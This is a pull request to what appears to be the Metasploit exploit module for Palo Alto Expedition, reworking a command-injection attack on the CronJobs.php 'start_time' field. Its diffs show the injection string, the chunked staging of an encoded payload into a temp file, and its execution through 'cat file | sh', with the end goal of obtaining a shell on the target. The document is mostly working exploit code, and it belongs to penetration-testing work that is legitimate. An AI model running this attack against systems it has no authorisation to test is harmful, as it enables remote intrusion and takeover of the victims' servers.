### PR TITLE
Stage cmd payloads to a file before executing

### DIFF
--- a/modules/exploits/linux/http/paloalto_expedition_rce.rb
+++ b/modules/exploits/linux/http/paloalto_expedition_rce.rb
@@ -39,6 +39,9 @@ class MetasploitModule < Msf::Exploit::Remote
           'FETCH_FILENAME' => Rex::Text.rand_text_alpha(1..3),
           'FETCH_WRITABLE_DIR' => '/tmp'
         },
+        'Payload' => {
+          'BadChars' => "\x3a\x3b\x26" # :;&
+        },
         'Platform' => %w[unix linux],
         'Arch' => [ ARCH_CMD ],
         'Targets' => [
@@ -66,7 +69,8 @@ class MetasploitModule < Msf::Exploit::Remote
         OptString.new('USERNAME', [false, 'Username for authentication, if available', 'admin']),
         OptString.new('PASSWORD', [false, 'Password for the specified user', 'paloalto']),
         OptString.new('TARGETURI', [ true, 'The URI for the Expedition web interface', '/']),
-        OptBool.new('RESET_ADMIN_PASSWD', [ true, 'Set this flag to true if you do not have credentials for the target and want to reset the current password to the default "paloalto"', false])
+        OptBool.new('RESET_ADMIN_PASSWD', [ true, 'Set this flag to true if you do not have credentials for the target and want to reset the current password to the default "paloalto"', false]),
+        OptString.new('WRITABLE_DIR', [ false, 'A writable directory to stage the command', '/tmp/' ]),
       ]
     )
   end
@@ -161,8 +165,33 @@ class MetasploitModule < Msf::Exploit::Remote
     return CheckCode::Appears
   end
 
+  def execute_command(cmd, name)
+    vprint_status("Running command: #{cmd}")
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'bin/CronJobs.php'),
+      'keep_cookies' => true,
+      'headers' => {
+        'Csrftoken' => @xsrf_token_value
+      },
+      'ctype' => 'application/x-www-form-urlencoded',
+      'vars_post' => {
+        'action' => 'set',
+        'type' => 'cron_jobs',
+        'project' => 'pandb',
+        'name' => name,
+        'cron_id' => 1,
+        'recurrence' => 'Daily',
+        'start_time' => "\";#{cmd} #"
+      }
+    )
+    fail_with(Failure::UnexpectedReply, "Unexpected HTTP code from the target: #{res.code}") unless res.code == 200
+  end
+
   def exploit
     cmd = payload.encoded
+    cmd_chunks = cmd.scan(/.{1,30}/)
+    staging_file = datastore['WRITABLE_DIR'] + '/' + Rex::Text.rand_text_alpha(3..5)
 
     if !@reset && !(datastore['USERNAME'] && datastore['PASSWORD'])
       unless datastore['RESET_ADMIN_PASSWD']
@@ -212,102 +241,21 @@ class MetasploitModule < Msf::Exploit::Remote
     data = res.get_json_document
     fail_with(Failure::UnexpectedReply, "Unexpected reply from the server: #{data}") unless data['success'] == true
 
-    cmd = cmd.gsub('http://', '').gsub('https://', '').gsub(':', '$(echo Og==|base64 -d)') # ':' breaks the injection if used directly
-    cmds = cmd.split(';')
-    cmds.each do |c|
-      if c.length > 97
-        print_bad("Command: '#{c}' is too long. Length: #{c.length}. Try to shorten it to 97 or less characters.")
-      end
-    end
-
     name = Rex::Text.rand_text_alpha(4..8)
     vprint_status('Using random name: ' + name)
     print_status('Injecting OS command...')
 
-    res = send_request_cgi(
-      'method' => 'POST',
-      'uri' => normalize_uri(target_uri.path, 'bin/CronJobs.php'),
-      'keep_cookies' => true,
-      'headers' => {
-        'Csrftoken' => @xsrf_token_value
-      },
-      'ctype' => 'application/x-www-form-urlencoded',
-      'vars_post' => {
-        'action' => 'set',
-        'type' => 'cron_jobs',
-        'project' => 'pandb',
-        'name' => name,
-        'cron_id' => 1,
-        'recurrence' => 'Daily',
-        'start_time' => "\";#{cmds[0]} #"
-      }
-    )
+    # Stage the command in a file
+    redirector = '>'
+    cmd_chunks.each do |chunk|
+      write_chunk = "echo -n \"#{chunk}\" #{redirector} #{staging_file}"
+      execute_command(write_chunk, name)
+      redirector = '>>'
+      sleep 1
+    end
 
-    fail_with(Failure::UnexpectedReply, "Unexpected HTTP code from the target: #{res.code}") unless res.code == 200
-
-    res = send_request_cgi(
-      'method' => 'POST',
-      'uri' => normalize_uri(target_uri.path, 'bin/CronJobs.php'),
-      'keep_cookies' => true,
-      'headers' => {
-        'Csrftoken' => @xsrf_token_value
-      },
-      'ctype' => 'application/x-www-form-urlencoded',
-      'vars_post' => {
-        'action' => 'set',
-        'type' => 'cron_jobs',
-        'project' => 'pandb',
-        'name' => name,
-        'cron_id' => 1,
-        'recurrence' => 'Daily',
-        'start_time' => "\";#{cmds[1]} #"
-      }
-    )
-
-    fail_with(Failure::UnexpectedReply, "Unexpected HTTP code from the target: #{res.code}") unless res.code == 200
-
-    send_request_cgi(
-      'method' => 'POST',
-      'uri' => normalize_uri(target_uri.path, 'bin/CronJobs.php'),
-      'keep_cookies' => true,
-      'headers' => {
-        'Csrftoken' => @xsrf_token_value
-      },
-      'ctype' => 'application/x-www-form-urlencoded',
-      'vars_post' => {
-        'action' => 'set',
-        'type' => 'cron_jobs',
-        'project' => 'pandb',
-        'name' => name,
-        'cron_id' => 1,
-        'recurrence' => 'Daily',
-        'start_time' => "\";#{cmds[2].gsub('&', '').gsub(/\s+/, ' ').strip} #"
-      }
-    )
-
-    fail_with(Failure::UnexpectedReply, "Unexpected HTTP code from the target: #{res.code}") unless res.code == 200
-
-    dropper = datastore['FETCH_WRITABLE_DIR'] + '/' + datastore['FETCH_FILENAME']
-    send_request_cgi(
-      'method' => 'POST',
-      'uri' => normalize_uri(target_uri.path, 'bin/CronJobs.php'),
-      'keep_cookies' => true,
-      'headers' => {
-        'Csrftoken' => @xsrf_token_value
-      },
-      'ctype' => 'application/x-www-form-urlencoded',
-      'vars_post' => {
-        'action' => 'set',
-        'type' => 'cron_jobs',
-        'project' => 'pandb',
-        'name' => name,
-        'cron_id' => 1,
-        'recurrence' => 'Daily',
-        'start_time' => "\";rm #{dropper} #"
-      }
-    )
-
-    fail_with(Failure::UnexpectedReply, "Unexpected HTTP code from the target: #{res.code}") unless res.code == 200
+    # execute the command from the file
+    execute_command("cat #{staging_file} | sh &", name)
 
     print_status('Check thy shell.')
   end

--- a/modules/exploits/linux/http/paloalto_expedition_rce.rb
+++ b/modules/exploits/linux/http/paloalto_expedition_rce.rb
@@ -40,7 +40,9 @@ class MetasploitModule < Msf::Exploit::Remote
           'FETCH_WRITABLE_DIR' => '/tmp'
         },
         'Payload' => {
-          'BadChars' => "\x3a\x3b\x26" # :;&
+          # the vulnerability allows the characters " and \
+          # but the stager in this module does not
+          'BadChars' => "\x22\x3a\x3b\x5c" # ":;\
         },
         'Platform' => %w[unix linux],
         'Arch' => [ ARCH_CMD ],
@@ -165,7 +167,8 @@ class MetasploitModule < Msf::Exploit::Remote
     return CheckCode::Appears
   end
 
-  def execute_command(cmd, name)
+  def execute_command(cmd, check_res)
+    name = Rex::Text.rand_text_alpha(4..8)
     vprint_status("Running command: #{cmd}")
     res = send_request_cgi(
       'method' => 'POST',
@@ -185,13 +188,17 @@ class MetasploitModule < Msf::Exploit::Remote
         'start_time' => "\";#{cmd} #"
       }
     )
-    fail_with(Failure::UnexpectedReply, "Unexpected HTTP code from the target: #{res.code}") unless res.code == 200
+    if check_res && !res.nil? && res.code != 200 # final execute command does not background for some reason?
+      fail_with(Failure::UnexpectedReply, "Unexpected HTTP code from the target: #{res.code}")
+    end
   end
 
   def exploit
     cmd = payload.encoded
-    cmd_chunks = cmd.scan(/.{1,30}/)
-    staging_file = datastore['WRITABLE_DIR'] + '/' + Rex::Text.rand_text_alpha(3..5)
+    chunk_size = rand(25..35)
+    vprint_status("Command chunk size = #{chunk_size}")
+    cmd_chunks = cmd.chars.each_slice(chunk_size).map(&:join)
+    staging_file = (datastore['WRITABLE_DIR'] + '/' + Rex::Text.rand_text_alpha(3..5)).gsub('//', '/')
 
     if !@reset && !(datastore['USERNAME'] && datastore['PASSWORD'])
       unless datastore['RESET_ADMIN_PASSWD']
@@ -241,21 +248,25 @@ class MetasploitModule < Msf::Exploit::Remote
     data = res.get_json_document
     fail_with(Failure::UnexpectedReply, "Unexpected reply from the server: #{data}") unless data['success'] == true
 
-    name = Rex::Text.rand_text_alpha(4..8)
-    vprint_status('Using random name: ' + name)
-    print_status('Injecting OS command...')
-
-    # Stage the command in a file
+    # Stage the command to a file
     redirector = '>'
+    chunk_counter = 0
     cmd_chunks.each do |chunk|
+      chunk_counter += 1
+      vprint_status("Staging chunk #{chunk_counter} of #{cmd_chunks.count}")
       write_chunk = "echo -n \"#{chunk}\" #{redirector} #{staging_file}"
-      execute_command(write_chunk, name)
+      execute_command(write_chunk, true)
       redirector = '>>'
       sleep 1
     end
 
-    # execute the command from the file
-    execute_command("cat #{staging_file} | sh &", name)
+    # Once we launch the payload, we don't seem to be able to execute another command,
+    # even if we try to background the command, so we need to execute and delete in
+    # the same command.
+
+    print_good('Command staged; command execution requires a timeout and will take a few seconds.')
+    execute_command("cat #{staging_file} | sh && rm #{staging_file}", false)
+    sleep 3
 
     print_status('Check thy shell.')
   end


### PR DESCRIPTION
This was not our original plan, but it works, and I think I like it better than the original plan. Instead of breaking the commands apart and executing each separately, I go ahead and use the built-in encoders to create a payload of any length, break it apart and stage it in chunks to a temp file. Then after the command is staged, I pipe the contents of the file to sh.
I'm basically ripping off from cmdstagers, but in a very controlled way. It means we should be able to use any cmd payload we want to, and we don't have to do any magic and rely on a specific payload syntax or size.
This is still a bit rough- I should add a command to remove the staging file, but I can add that next week. I do want to get another couple eyes on this to make sure I have not created a worse problem with this solution.
I did want to get your opinion of this solution. I can clean it up next week if you're OK with this direction.